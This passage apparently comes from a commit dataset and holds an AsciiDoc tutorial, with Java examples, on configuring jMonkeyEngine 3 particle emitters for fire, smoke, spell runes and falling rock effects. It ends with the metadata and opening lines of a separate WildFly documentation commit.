previous example uses a MeshSource, this picks a random triangle from the mesh without any regard given to the size of different triangles. This means areas with small triangles are actually more likely to emit particles than areas with large triangles. For most meshes this is not visible, however there is a WeightedMeshSource available if this should be a problem.\n\nThe WeightedMeshSource scans the mesh and works out a weight for each triangle based on its relative size, so that the result is an even spread of particles even with very large differences in triangle sizes. There are some limitations with this though:\n\n. The WeightedMeshSource consumes more memory as it needs to remember the weights\n. The WeightedMeshSource is slower as it needs to do more work to pick a triangle\n. The WeightedMeshSource does not update automatically if the mesh changes, if triangles are added they will not emit, if triangles are removed it could cause a crash. If triangles change shape then the weights are not updated.\n\nThere is a method available to cause the weights to be recalculated which can be used if changing the mesh, but really if possible a non-weighted MeshSource should be used for dynamic meshes.\n\n\n== 3d Particles - TemplateMesh\n\nThe previous mesh examples all use simple 2d quads to display images. There is another mesh type though, the TemplateMesh, which allows fully featured 3d particles to be used.\n\n\n[NOTE]\n====\n\nThere is a rock texture available in the jME3 test data, or you can substitute any other suitable texture. The model for this example is: link:http:\/\/www.zero-separation.com\/particles\/FracturedCube.j3o[FracturedCube.j3o]\n\n====\n\n\n[source,java]\n----\n\n @Override\n public void simpleInitApp() {\n\n \/\/ Since we actually use a full lit material for these particles we need\n \/\/ to add a light to the scene in order to see anything.\n DirectionalLight dl = new DirectionalLight();\n dl.setDirection(new Vector3f(-0.1f,-0.7f,-1).normalizeLocal());\n dl.setColor(new ColorRGBA(0.6f, 0.60f, 0.60f, 1.0f));\n rootNode.addLight(dl);\n\n\/\/ A standard lit material is used, this rock texture was taking from the\n\/\/ jme3 test data but you can easily substitute your own.\n Material rock = new Material(assetManager, \"Common\/MatDefs\/Light\/Lighting.j3md\");\n rock.setTexture(\"DiffuseMap\", assetManager.loadTexture(\"Textures\/Rock.PNG\"));\n rock.setFloat(\"Shininess\", 100f);\n\n\/\/ A PointSource is actually a fully featured Spatial object, in this case\n\/\/ we simply adjust its translation, but it can actually be attached to the\n\/\/ scene graph and the source will automatically move as the Node to which\n\/\/ it is attached is transformed.\n PointSource source = new PointSource(new Vector3f(-5,-5,-5), new Vector3f(5,5,5));\n source.setLocalTranslation(0, 10, -20);\n\n\/\/ A TemplateMesh uses any number of standard meshes to be the template for\n\/\/ each 3d particle. This model was generated simply by taking a cube in\n\/\/ Blender and running a fracture script on it to generate 20 fragments.\n Node n = (Node) assetManager.loadModel(\"Models\/FracturedCube.j3o\");\n Mesh[] templates = new Mesh[n.getChildren().size()];\n int i = 0;\n for (Spatial s: n.getChildren()) {\n Geometry g = (Geometry)((Node)s).getChild(0);\n templates[i++] = g.getMesh();\n }\n\n\/\/ Construct the new particle controller\n ParticleController rockCtrl = new ParticleController(\n \"TemplateMesh\",\n\/\/ The TemplateMesh uses the rock material we created previously, the two boolean\n\/\/ flags say that we are not interested in vertex colours but we do want the vertex\n\/\/ normals. The array of meshes extracted from the model is then passed in to use\n\/\/ as models for each particle.\n new TemplateMesh(rock, false, true, templates),\n\/\/ A maximum of 64 particles at once, each lasting for 5 to 5.5 seconds.\n 64,\n 5,\n 5.5f,\n\/\/ Particles are emitted from the source that we created and positioned earlier\n source,\n\/\/ Emit 8 particles per second\n new RegularEmission(8),\n\/\/ The \"sprites\" in this case are the available templates. The TemplateMesh has\n\/\/ one spriteColumn for each template it has been provided, so the standard\n\/\/ RandomSpriteInfluencer just causes one to be picked at random each time a\n\/\/ particle is emitted.\n new RandomSpriteInfluencer(),\n\/\/ Rocks fall.\n new GravityInfluencer(new Vector3f(0, -4, 0)),\n\/\/ Rocks spin.\n new RotationInfluencer(new Vector3f(-2, -2, -2), new Vector3f(2, 2, 2), false));\n\n rootNode.attachChild(rockCtrl.getGeometry());\n }\n\n----\n\nThe result should look like:\n\n* link:https:\/\/www.youtube.com\/watch?v=a7y53UF8Giw[Video: Particle Emitter Example 3]\n\nAny number and mixture of models can be used, although as it is all a single mesh the same material must be used for all of them. It is recommended to keep a similar number of vertices for each of the models but that is not a strict requirement.\n\n\n== Emitting Particles from Particles\n\nTo add more dramatic effects sometimes you want to emit particles from particles, this could be done simply by attaching a MeshSource for the second controller to the mesh from the first controller. There are a number of limitations to this approach though, which will be demonstrated now:\n\nAdding the following code:\n\n[source,java]\n----\n\n\n\n\n ParticleController pCtrl = new ParticleController(\n \"TemplateFlames\",\n new PointMesh(assetManager, \"Textures\/flame.png\", 2, 2),\n 1300,\n 3,\n 4,\n new MeshSource(rockCtrl.getGeometry()),\n new RegularEmission(320),\n new SizeInfluencer(0.5f, 2),\n new ColorInfluencer(new ColorRGBA(1,1,0.1f, 1f), new ColorRGBA(1,0,0,0.05f)),\n new GravityInfluencer(new Vector3f(0, 0.3f, 0)),\n new RandomImpulseInfluencer(\n RandomImpulseInfluencer.ImpulseApplicationTime.INITIALIZE,\n new Vector3f(-0.5f, -0.5f, -0.5f),\n new Vector3f(0.5f, 0.5f, 0.5f)));\n\n rootNode.attachChild(pCtrl.getGeometry());\n\n\n----\n\nResults in something that looks like this:\n\n* link:https:\/\/www.youtube.com\/watch?v=WGR5RzF9APg[Video: Particle Emitter Example 3]\n\nYou can see that while dramatic the fire is left behind each particle, this is because although it is emitted from the face of the particle at its current position it has no knowledge of how that particle is moving.\n\nTo allow for this we also offer a different emitter, this allows one ParticleController to act as the source for another. The emitted particles are then able to start with the same velocity and rotation of the particle they are being emitted from and then move onwards from there as appropriate.\n\nLeave everything else the same but change the MeshSource into\n\n[source,java]\n----\n\n new ParticleParticleSource(rockCtrl),\n\n----\n\nYou can see that this gives much better results:\n\n* link:https:\/\/www.youtube.com\/watch?v=2BlBZVM0EZQ[Video: Particle Emitter Example 4]\n\nThere is a lot of falling rocks and fire here, but not much in the way of smoke. That could be added using a multi-colour emitter as previously, but the standard particle material is additive. That means it can only make colours brighter, never darker. For smoke it should be able to darken as well as lighten.\n\nTo add smoke we can add a third emitter after the other two:\n\n[source,java]\n----\n\n\n\/\/ Construct a new material for the smoke based off the default particle material\n Material smokeMat = new Material(\n assetManager, \"Common\/MatDefs\/Misc\/Particle.j3md\");\n\/\/ The Smoke.png texture can be found in the jme3 test data\n smokeMat.setTexture(\"Texture\",\n assetManager.loadTexture(\"Textures\/Smoke.png\"));\n\/\/ Set the blend mode to Alpha rather than AlphaAdditive so that dark smoke\n\/\/ can darken the scene behind it\n smokeMat.getAdditionalRenderState().setBlendMode(RenderState.BlendMode.Alpha);\n\/\/ For point sprite meshes this parameter must be set\n smokeMat.setBoolean(\"PointSprite\", true);\n\n\/\/ Construct the new particle controller\n pCtrl = new ParticleController(\n \"TemplateSmoke\",\n\/\/ The Smoke.png texture contains 15 sprites, if you use a different texture adjust\n\/\/ these parameters accordingly.\n new PointMesh(smokeMat, 15, 1),\n 800,\n 4,\n 5,\n new ParticleParticleSource(rockCtrl),\n new RegularEmission(180),\n new SizeInfluencer(1f, 2.5f),\n new MultiColorInfluencer(\n new MultiColorInfluencer.Stage(0, new ColorRGBA(1, 1, 1, 0)),\n new MultiColorInfluencer.Stage(0.5f, new ColorRGBA(0, 0, 0, 0.5f)),\n new MultiColorInfluencer.Stage(1, new ColorRGBA(1, 1, 1, 0))),\n new GravityInfluencer(new Vector3f(0, 0.75f, 0)),\n new RandomImpulseInfluencer(\n RandomImpulseInfluencer.ImpulseApplicationTime.INITIALIZE,\n new Vector3f(-0.5f, -0.5f, -0.5f),\n new Vector3f(0.5f, 0.5f, 0.5f)));\n\n rootNode.attachChild(pCtrl.getGeometry());\n\n----\n\nThe results look something like:\n\n* link:https:\/\/www.youtube.com\/watch?v=01qCBGBvf-c[Video: Particle Emitter Example 5]\n\nTo complete the effect one final line of code adds a skybox (using another texture that can be find in the test data):\n\n[source,java]\n----\n\n rootNode.attachChild(SkyFactory.createSky(assetManager, \"Textures\/BrightSky.dds\", false));\n\n----\n\nNow we have the final effect which looks like:\n\n* link:https:\/\/www.youtube.com\/watch?v=uDeWAjw4LxU[Video: Particle Emitter Example 6]\n","old_contents":"= Next Generation Particle Emitters\n:revnumber: 2.0\n:revdate: 2020\/07\/25\n\n\nThis is a new particle system for jME3 posted for review and comments. This is an opportunity for people to comment on and request changes to the +++<abbr title=\"Application Programming Interface\">API<\/abbr>+++ or the internal functionality of the system.\nThe code for this particle system can be found link:https:\/\/github.com\/jMonkeyEngine-Contributions\/ParticleController[jMonkeyEngine-Contributions]\n\nApologies for the slight jitter in some of the videos, the VideoRecorderState seems to be causing some issues which are not present when the application is running normally.\n\n\n== Credits\n\nThese particle emitters are inspired by and use some code from t0neg0ds particle emitters as described link:http:\/\/hub.jmonkeyengine.org\/t\/influencer-based-particleemitter-candidate-mesh-based-animated-particles\/25831[here]\n\nThose in turn were based on the original jME3 particle system by Kirill Vainer\n\n\n== The Big Picture\n\nThe core of all Particle Emitters is a ParticleController. That is used to manage all of the particles, the behaviour of the particles themselves though is controlled though a number of other classes that are plugged in to the ParticleController to provide the required functionality. You can think of the ParticleController as providing the central hub into which you plug all the modules you need to get the desired behaviour.\n\nAn easy way to see what you need is to create a new ParticleController and then look at the constructor, you can see what parameters need to be supplied there.\n[cols=\"2\", options=\"header\"]\n|===\n\na| name\na| The name to use for the geometry in the scene graph\n\na| mesh\na| The mesh to use (Usually either PointMesh or QuadMesh)\n\na| maxParticles\na| The maximum number of particles to allow active at any one time\n\na| lifeMin\na| The minimum amount of time (in seconds) for which each particle lives\n\na| lifeMax\na| The maximum amount of time (in seconds) for which each particle lives\n\na| source\na| The source from which the particles are spawned\n\na| emissionController\na| The frequency and timing with which particles are spawned. If null then no particles are automatically spawned and they must be triggered manually using emitNextParticle() or emitAllParticles()\n\na| influencers\na| Zero or more ParticleInfluencers, each of which changes the behaviour of the particles.\n\n|===\n\nBy selecting the behaviour you desire for each option you can configure up a virtually infinite array of possible particle emitters.\n\nWe will now walk through some common examples and possible uses, and then in the end we will document all of the possible choices for these options.\n\nFor a full reference of the standard options available see the xref:effect\/particles\/reference.adoc[Reference Page].\n\n\n== Simple Fire\n\n[source,java]\n----\n\n\npublic class HelloParticles1_SimpleFire extends SimpleApplication {\n\n public static void main(String[] args){\n HelloParticles1_SimpleFire app = new HelloParticles1_SimpleFire();\n app.start(); \/\/ start the game\n }\n\n @Override\n public void simpleInitApp() {\n\n\/\/ Construct a new ParticleController\n ParticleController pCtrl = new ParticleController(\n\/\/ The name of the emitter\n \"SimpleFire\",\n\/\/ Use a simple point mesh (the fastest but most limitted mesh type) with the specified\n\/\/ image (from jME3-testdata). The image actually contains a 2x2 grid of sprites.\n new PointMesh(assetManager, \"Effects\/Explosion\/flame.png\", 2, 2),\n\/\/ Allow at most 32 particles at any time\n 32,\n\/\/ Particles last for at least 2 seconds\n 2,\n\/\/ And at most 3 seconds\n 3,\n\/\/ Point sources always generate particles at the location of the source, the particles\n\/\/ are given a random velocity between the two given.\n new PointSource(new Vector3f(-3, 0, -3), new Vector3f(3, 0, 3)),\n\/\/ Emit particles at regular intervals, 10 particles every second\n new RegularEmission(10),\n\/\/ ** Influencers start here\n\/\/ Select a random sprite from the 4 available for each particle\n new RandomSpriteInfluencer(),\n\/\/ Particles start off with a size of 0.5 units, end with a radius of 0.1\n new SizeInfluencer(0.5f, 0.1f),\n\/\/ Particles start yellow full opacity and fade towards red with very low opacity\n new ColorInfluencer(new ColorRGBA(1,1,0.2f,1), new ColorRGBA(1,0,0,0.1f)),\n\/\/ No matter what velocity particles started with they will start moving upwards.\n new PreferredDirectionInfluencer(new Vector3f(0, 1, 0), 0.25f));\n\n\/\/ Finally attach the geometry to the rootNode in order to start the particles running\n rootNode.attachChild(pCtrl.getGeometry());\n }\n}\n\n----\n\nRun that and the result should look something like:\n\nimage:jme3\/particles1.jpg[particles1.jpg,width=\"\",height=\"\"]\n\n\n== Simple Fire and Smoke\n\n[source,java]\n----\n\n @Override\n public void simpleInitApp() {\n\n\/\/ Construct a new ParticleController\n ParticleController pCtrl = new ParticleController(\n\/\/ The name of the emitter\n \"SimpleFire\",\n\/\/ Use a simple point mesh (the fastest but most limitted mesh type) with the specified\n\/\/ image (from jME3-testdata). The image actually contains a 2x2 grid of sprites.\n new PointMesh(assetManager, \"Effects\/Explosion\/flame.png\", 2, 2),\n\/\/ Allow at most 50 particles at any time, the particles are lasting longer this time\n\/\/ so we need to allow more on screen at once\n 50,\n\/\/ Particles last for at least 4 seconds\n 4,\n\/\/ And at most 5 seconds\n 5,\n\/\/ Point sources always generate particles at the location of the source, the particles\n\/\/ are given a random velocity between the two given.\n new PointSource(new Vector3f(-3, 0, -3), new Vector3f(3, 0, 3)),\n\/\/ Emit particles at regular intervals, 10 particles every second\n new RegularEmission(10),\n\/\/ ** Influencers start here\n\/\/ Select a random sprite from the 4 available for each particle\n new RandomSpriteInfluencer(),\n\/\/ Particles start off with a size of 0.5 units, end with a radius of 0.1\n new SizeInfluencer(0.5f, 0.25f),\n\/\/ Particles start yellow full opacity and fade towards red with very low opacity\n new MultiColorInfluencer(\n new MultiColorInfluencer.Stage(0, new ColorRGBA(1, 1, 0.1f, 1)),\n new MultiColorInfluencer.Stage(0.15f, new ColorRGBA(1, 0, 0, 0.25f)),\n new MultiColorInfluencer.Stage(0.3f, new ColorRGBA(1f, 1f, 1f, 0.5f)),\n new MultiColorInfluencer.Stage(1, new ColorRGBA(1f,1f,1f,0f))\n ),\n\/\/ No matter what velocity particles started with they will start moving upwards.\n new PreferredDirectionInfluencer(new Vector3f(0, 1, 0), 0.25f));\n\n\/\/ Finally attach the geometry to the rootNode in order to start the particles running\n rootNode.attachChild(pCtrl.getGeometry());\n }\n\n----\n\nYou can see that the only change is to make the particles last a little longer and to change the ColorInfluencer for a MultiColorInfluencer, and yet the results look quite different:\n\nimage:jme3\/particles2.jpg[particles2.jpg,width=\"\",height=\"\"]\n\nThis isn't a very convincing fire yet, but it is very simple to get up and running. One problem with this approach is that particles are done using an alpha-additive material, they can only make things brighter but never darker. That is not ideal for smoke which should be able to make them darker too. We will look at this again later but for now we will move on to some different mesh types.\n\n\n== Quad Meshes and Billboarding\n\nPoint Meshes are extremely fast, but they have a number of limitations. The main ones being that the sprites must always be facing towards the screen and that on certain graphics cards the maximum number of pixels a sprite can occupy on the screen is limited.\n\nWhile PointMesh is recommended for basic particles for more advanced options there is the QuadMesh, this constructs each particle using a quad and as a result can allow any size on the screen and any orientation. The following example combines two separate particle emitters to produce a spell-like effect.\n\n\n[NOTE]\n====\n\nThe flame image from before is used for the second emitter, the first emitter uses this image which you can download and use:\n\nimage:jme3\/runecircle.png[runecircle.png,width=\"256\",height=\"\"]\n\n====\n\n\n[source,java]\n----\n\n @Override\n public void simpleInitApp() {\n\n\/\/ Construct a new ParticleController to provide the actual spell runes effect\n ParticleController pCtrl = new ParticleController(\n\/\/ The name of the emitter\n \"SpellRunes\",\n\/\/ Use a Quad Mesh, this image is available for download on this page. The texture file contains\n\/\/ a single image so there are no sprite columns and rows to set up. The BillboardStrategy is how\n\/\/ the particles should be oriented, in this case it uses the particle rotation.\n new QuadMesh(QuadMeshBillboardStrategy.USE_PARTICLE_ROTATION, assetManager, \"Textures\/runeCircle.png\"),\n\/\/ Allow at most 9 particles at any time\n 9,\n\/\/ Particles always last for 4 seconds\n 4,\n 4,\n\/\/ We want to generate all particles from the same location with the same velocity.\n new PointSource(new Vector3f(0, 1f, 0), new Vector3f(0, 1f, 0)),\n\/\/ Emit particles at regular intervals, 4 particles every second\n new RegularEmission(2),\n\/\/ ** Influencers start here\n\/\/ These particles should be size 3 and stay the same size\n new SizeInfluencer(3, 3),\n\/\/ Start the particles at full opacity blue and then fade them out to 0 opacity cyan.\n new ColorInfluencer(ColorRGBA.Blue, new ColorRGBA(0, 1, 1, 0)),\n\/\/ Rotate all particles by the same amount. The units are radians-per-second\n new RotationInfluencer(\n new Vector3f(0, FastMath.QUARTER_PI, 0),\n new Vector3f(0, FastMath.QUARTER_PI, 0), false));\n\n\/\/ Finally attach the geometry to the rootNode in order to start the particles running\n rootNode.attachChild(pCtrl.getGeometry());\n\n\n\/\/ Construct a new ParticleController to provide the central glow effect\n pCtrl = new ParticleController(\n\/\/ The name of the emitter\n \"SpellBase\",\n\/\/ Use a simple point mesh (the fastest but most limitted mesh type) with the specified\n\/\/ image (from jME3-testdata). The image actually contains a 2x2 grid of sprites.\n new PointMesh(assetManager, \"Textures\/flame.png\", 2, 2),\n\/\/ Allow at most 76 particles at any time\n 76,\n\/\/ Particles last for at least 5 seconds\n 5,\n\/\/ And at most 5 seconds\n 5,\n\/\/ Point sources always generate particles at the location of the source, the particles\n\/\/ are given a random velocity between the two given.\n new PointSource(new Vector3f(-1f, 0, -1f), new Vector3f(1f, 0.5f, 1f)),\n\/\/ Emit particles at regular intervals, 15 particles every second\n new RegularEmission(15),\n\/\/ ** Influencers start here\n\/\/ Select a random sprite from the 4 available for each particle\n new RandomSpriteInfluencer(),\n\/\/ Particles start red with some blue and green and fade towards blue zero opacity\n\/\/ Because particles are rendered using an additive blend then any area where a lot\n\/\/ of particles overlap will end up white.\n new ColorInfluencer(new ColorRGBA(1,0.25f,0.25f,0.25f), new ColorRGBA(0,0,1,0f)));\n\n\/\/ Finally attach the geometry to the rootNode in order to start the particles running\n rootNode.attachChild(pCtrl.getGeometry());\n\n\n cam.setLocation(new Vector3f(0, 10, -10));\n cam.lookAt(Vector3f.ZERO, Vector3f.UNIT_Y);\n }\n\n\n----\n\nThe result should look something like:\n\n* link:https:\/\/www.youtube.com\/watch?v=_Spjqag99HY[Video: Particle Emitter Example 1]\n\n\n== Using a mesh as the particle source\n\nThere is a model of a monkeys head in the test data that is used in this example, although you can use any other model you like. Just make sure you can find the geometry within the model for the next step.\n\n[source,java]\n----\n\n @Override\n public void simpleInitApp() {\n\n Node monkey = (Node) assetManager.loadModel(\"Models\/MonkeyHead\/MonkeyHead.mesh.xml\");\n rootNode.attachChild(monkey);\n\n DirectionalLight dl = new DirectionalLight();\n dl.setDirection(new Vector3f(-0.1f,-0.7f,-1).normalizeLocal());\n dl.setColor(new ColorRGBA(0.88f, 0.60f, 0.60f, 1.0f));\n rootNode.addLight(dl);\n\n AmbientLight al = new AmbientLight();\n al.setColor(ColorRGBA.White);\n rootNode.addLight(al);\n\n----\n\nThe result should look something like:\n\nimage:jme3\/particles3.jpg[particles3.jpg,width=\"\",height=\"\"]\n\nNow lets set fire to the monkey! (No monkeys were harmed during the making of this particle system!).\n\n[source,java]\n----\n\n\n\/\/ Construct a new ParticleController\n ParticleController pCtrl = new ParticleController(\n\/\/ The name of the emitter\n \"SimpleFire\",\n\/\/ Use a simple point mesh (the fastest but most limitted mesh type) with the specified\n\/\/ image (from jME3-testdata). The image actually contains a 2x2 grid of sprites.\n new PointMesh(assetManager, \"Textures\/flame.png\", 2, 2),\n\/\/ Allow at most 1200 particles at any time, the particles are lasting longer this time\n\/\/ so we need to allow more on screen at once\n 1200,\n\/\/ Particles last for at least 4 seconds\n 4,\n\/\/ And at most 5 seconds\n 5,\n\/\/ A MeshSource scans a geometry and picks a random point on the surface of that\n\/\/ geometry in order to emit the particle from it. The particle has an inital velocity\n\/\/ of 1wu\/s along the normal of the triangle from which it is emitted.\n new MeshSource(g),\n\/\/ Emit particles at regular intervals, 10 particles every second\n new RegularEmission(240),\n\/\/ ** Influencers start here\n\/\/ Select a random sprite from the 4 available for each particle\n new RandomSpriteInfluencer(),\n\/\/ Particles start off with a size of 0.1 units, end with a size of 0.15\n new SizeInfluencer(0.1f, 0.15f),\n\/\/ Particles have a constant speed of 0.25f, this will modify the original speed\n\/\/ from the emitter and then allow the GravityInfluencer to change the direction\n\/\/ of motion but constrain the speed\n new SpeedInfluencer(0.25f, 0.25f),\n\/\/ Fade the paticles through a range of colours\n new MultiColorInfluencer(\n new MultiColorInfluencer.Stage(0, new ColorRGBA(1, 1, 0.1f, 1)),\n new MultiColorInfluencer.Stage(0.25f, new ColorRGBA(1, 0, 0, 0.25f)),\n new MultiColorInfluencer.Stage(0.5f, new ColorRGBA(1f, 1f, 1f, 0.25f)),\n new MultiColorInfluencer.Stage(1, new ColorRGBA(1f,1f,1f,0f))\n ),\n\/\/ No matter what velocity particles started with they will start moving upwards.\n new GravityInfluencer(new Vector3f(0, 0.5f, 0)));\n\n\/\/ Finally attach the geometry to the rootNode in order to start the particles running\n rootNode.attachChild(pCtrl.getGeometry());\n\n----\n\nAgain this is just a very simple example, much more sophisticated fire effects are possible with the use of the right textures and mixture of emitters and influencers. The result though should look something like this:\n\n* link:https:\/\/www.youtube.com\/watch?v=W__zGJHZ2AU[Video: Particle Emitter Example 2]\n\n\n== Meshes and Weighted Meshes\n\nThe previous example uses a MeshSource, this picks a random triangle from the mesh without any regard given to the size of different triangles. This means areas with small triangles are actually more likely to emit particles than areas with large triangles. For most meshes this is not visible, however there is a WeightedMeshSource available if this should be a problem.\n\nThe WeightedMeshSource scans the mesh and works out a weight for each triangle based on its relative size, so that the result is an even spread of particles even with very large differences in triangle sizes. There are some limitations with this though:\n\n. The WeightedMeshSource consumes more memory as it needs to remember the weights\n. The WeightedMeshSource is slower as it needs to do more work to pick a triangle\n. The WeightedMeshSource does not update automatically if the mesh changes, if triangles are added they will not emit, if triangles are removed it could cause a crash. If triangles change shape then the weights are not updated.\n\nThere is a method available to cause the weights to be recalculated which can be used if changing the mesh, but really if possible a non-weighted MeshSource should be used for dynamic meshes.\n\n\n== 3d Particles - TemplateMesh\n\nThe previous mesh examples all use simple 2d quads to display images. There is another mesh type though, the TemplateMesh, which allows fully featured 3d particles to be used.\n\n\n[NOTE]\n====\n\nThere is a rock texture available in the jME3 test data, or you can substitute any other suitable texture. The model for this example is: link:http:\/\/www.zero-separation.com\/particles\/FracturedCube.j3o[FracturedCube.j3o]\n\n====\n\n\n[source,java]\n----\n\n @Override\n public void simpleInitApp() {\n\n \/\/ Since we actually use a full lit material for these particles we need\n \/\/ to add a light to the scene in order to see anything.\n DirectionalLight dl = new DirectionalLight();\n dl.setDirection(new Vector3f(-0.1f,-0.7f,-1).normalizeLocal());\n dl.setColor(new ColorRGBA(0.6f, 0.60f, 0.60f, 1.0f));\n rootNode.addLight(dl);\n\n\/\/ A standard lit material is used, this rock texture was taking from the\n\/\/ jme3 test data but you can easily substitute your own.\n Material rock = new Material(assetManager, \"Common\/MatDefs\/Light\/Lighting.j3md\");\n rock.setTexture(\"DiffuseMap\", assetManager.loadTexture(\"Textures\/Rock.PNG\"));\n rock.setFloat(\"Shininess\", 100f);\n\n\/\/ A PointSource is actually a fully featured Spatial object, in this case\n\/\/ we simply adjust its translation, but it can actually be attached to the\n\/\/ scene graph and the source will automatically move as the Node to which\n\/\/ it is attached is transformed.\n PointSource source = new PointSource(new Vector3f(-5,-5,-5), new Vector3f(5,5,5));\n source.setLocalTranslation(0, 10, -20);\n\n\/\/ A TemplateMesh uses any number of standard meshes to be the template for\n\/\/ each 3d particle. This model was generated simply by taking a cube in\n\/\/ Blender and running a fracture script on it to generate 20 fragments.\n Node n = (Node) assetManager.loadModel(\"Models\/FracturedCube.j3o\");\n Mesh[] templates = new Mesh[n.getChildren().size()];\n int i = 0;\n for (Spatial s: n.getChildren()) {\n Geometry g = (Geometry)((Node)s).getChild(0);\n templates[i++] = g.getMesh();\n }\n\n\/\/ Construct the new particle controller\n ParticleController rockCtrl = new ParticleController(\n \"TemplateMesh\",\n\/\/ The TemplateMesh uses the rock material we created previously, the two boolean\n\/\/ flags say that we are not interested in vertex colours but we do want the vertex\n\/\/ normals. The array of meshes extracted from the model is then passed in to use\n\/\/ as models for each particle.\n new TemplateMesh(rock, false, true, templates),\n\/\/ A maximum of 64 particles at once, each lasting for 5 to 5.5 seconds.\n 64,\n 5,\n 5.5f,\n\/\/ Particles are emitted from the source that we created and positioned earlier\n source,\n\/\/ Emit 8 particles per second\n new RegularEmission(8),\n\/\/ The \"sprites\" in this case are the available templates. The TemplateMesh has\n\/\/ one spriteColumn for each template it has been provided, so the standard\n\/\/ RandomSpriteInfluencer just causes one to be picked at random each time a\n\/\/ particle is emitted.\n new RandomSpriteInfluencer(),\n\/\/ Rocks fall.\n new GravityInfluencer(new Vector3f(0, -4, 0)),\n\/\/ Rocks spin.\n new RotationInfluencer(new Vector3f(-2, -2, -2), new Vector3f(2, 2, 2), false));\n\n rootNode.attachChild(rockCtrl.getGeometry());\n }\n\n----\n\nThe result should look like:\n\n* link:https:\/\/www.youtube.com\/watch?v=a7y53UF8Giw[Video: Particle Emitter Example 3]\n\nAny number and mixture of models can be used, although as it is all a single mesh the same material must be used for all of them. It is recommended to keep a similar number of vertices for each of the models but that is not a strict requirement.\n\n\n== Emitting Particles from Particles\n\nTo add more dramatic effects sometimes you want to emit particles from particles, this could be done simply by attaching a MeshSource for the second controller to the mesh from the first controller. There are a number of limitations to this approach though, which will be demonstrated now:\n\nAdding the following code:\n\n[source,java]\n----\n\n\n\n\n ParticleController pCtrl = new ParticleController(\n \"TemplateFlames\",\n new PointMesh(assetManager, \"Textures\/flame.png\", 2, 2),\n 1300,\n 3,\n 4,\n new MeshSource(rockCtrl.getGeometry()),\n new RegularEmission(320),\n new SizeInfluencer(0.5f, 2),\n new ColorInfluencer(new ColorRGBA(1,1,0.1f, 1f), new ColorRGBA(1,0,0,0.05f)),\n new GravityInfluencer(new Vector3f(0, 0.3f, 0)),\n new RandomImpulseInfluencer(\n RandomImpulseInfluencer.ImpulseApplicationTime.INITIALIZE,\n new Vector3f(-0.5f, -0.5f, -0.5f),\n new Vector3f(0.5f, 0.5f, 0.5f)));\n\n rootNode.attachChild(pCtrl.getGeometry());\n\n\n----\n\nResults in something that looks like this:\n\n* link:https:\/\/www.youtube.com\/watch?v=WGR5RzF9APg[Video: Particle Emitter Example 3]\n\nYou can see that while dramatic the fire is left behind each particle, this is because although it is emitted from the face of the particle at its current position it has no knowledge of how that particle is moving.\n\nTo allow for this we also offer a different emitter, this allows one ParticleController to act as the source for another. The emitted particles are then able to start with the same velocity and rotation of the particle they are being emitted from and then move onwards from there as appropriate.\n\nLeave everything else the same but change the MeshSource into\n\n[source,java]\n----\n\n new ParticleParticleSource(rockCtrl),\n\n----\n\nYou can see that this gives much better results:\n\n* link:https:\/\/www.youtube.com\/watch?v=2BlBZVM0EZQ[Video: Particle Emitter Example 4]\n\nThere is a lot of falling rocks and fire here, but not much in the way of smoke. That could be added using a multi-colour emitter as previously, but the standard particle material is additive. That means it can only make colours brighter, never darker. For smoke it should be able to darken as well as lighten.\n\nTo add smoke we can add a third emitter after the other two:\n\n[source,java]\n----\n\n\n\/\/ Construct a new material for the smoke based off the default particle material\n Material smokeMat = new Material(\n assetManager, \"Common\/MatDefs\/Misc\/Particle.j3md\");\n\/\/ The Smoke.png texture can be found in the jme3 test data\n smokeMat.setTexture(\"Texture\",\n assetManager.loadTexture(\"Textures\/Smoke.png\"));\n\/\/ Set the blend mode to Alpha rather than AlphaAdditive so that dark smoke\n\/\/ can darken the scene behind it\n smokeMat.getAdditionalRenderState().setBlendMode(RenderState.BlendMode.Alpha);\n\/\/ For point sprite meshes this parameter must be set\n smokeMat.setBoolean(\"PointSprite\", true);\n\n\/\/ Construct the new particle controller\n pCtrl = new ParticleController(\n \"TemplateSmoke\",\n\/\/ The Smoke.png texture contains 15 sprites, if you use a different texture adjust\n\/\/ these parameters accordingly.\n new PointMesh(smokeMat, 15, 1),\n 800,\n 4,\n 5,\n new ParticleParticleSource(rockCtrl),\n new RegularEmission(180),\n new SizeInfluencer(1f, 2.5f),\n new MultiColorInfluencer(\n new MultiColorInfluencer.Stage(0, new ColorRGBA(1, 1, 1, 0)),\n new MultiColorInfluencer.Stage(0.5f, new ColorRGBA(0, 0, 0, 0.5f)),\n new MultiColorInfluencer.Stage(1, new ColorRGBA(1, 1, 1, 0))),\n new GravityInfluencer(new Vector3f(0, 0.75f, 0)),\n new RandomImpulseInfluencer(\n RandomImpulseInfluencer.ImpulseApplicationTime.INITIALIZE,\n new Vector3f(-0.5f, -0.5f, -0.5f),\n new Vector3f(0.5f, 0.5f, 0.5f)));\n\n rootNode.attachChild(pCtrl.getGeometry());\n\n----\n\nThe results look something like:\n\n* link:https:\/\/www.youtube.com\/watch?v=01qCBGBvf-c[Video: Particle Emitter Example 5]\n\nTo complete the effect one final line of code adds a skybox (using another texture that can be find in the test data):\n\n[source,java]\n----\n\n rootNode.attachChild(SkyFactory.createSky(assetManager, \"Textures\/BrightSky.dds\", false));\n\n----\n\nNow we have the final effect which looks like:\n\n* link:https:\/\/www.youtube.com\/watch?v=uDeWAjw4LxU[Video: Particle Emitter Example 6]\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"27981b64c351c7928c1be07bbd036abd2f5a89ae","subject":"[WFLY-11932] Advise users to use HTTPS as well in example subsystem doc","message":"[WFLY-11932] Advise users to use HTTPS as well in example subsystem doc\n","repos":"jstourac\/wildfly,wildfly\/wildfly,rhusar\/wildfly,rhusar\/wildfly,pferraro\/wildfly,pferraro\/wildfly,tadamski\/wildfly,wildfly\/wildfly,wildfly\/wildfly,pferraro\/wildfly,tadamski\/wildfly,jstourac\/wildfly,rhusar\/wildfly,rhusar\/wildfly,tadamski\/wildfly,iweiss\/wildfly,iweiss\/wildfly,wildfly\/wildfly,iweiss\/wildfly,jstourac\/wildfly,jstourac\/wildfly,iweiss\/wildfly,pferraro\/wildfly","old_file":"docs\/src\/main\/asciidoc\/_extending-wildfly\/Example_subsystem.adoc","new_file":"docs\/src\/main\/asciidoc\/_extending-wildfly\/Example_subsystem.adoc","new_contents":"[[Example_subsystem]]\n= Example subsystem\n\nOur example subsystem will keep track of all deployments of certain\ntypes containing a special marker file, and expose operations to see how\nlong these deployments have been deployed.\n\n[[create-the-skeleton-project]]\n== Create the skeleton project\n\nTo make your life easier we have provided a maven archetype which will\ncreate a skeleton project for implementing 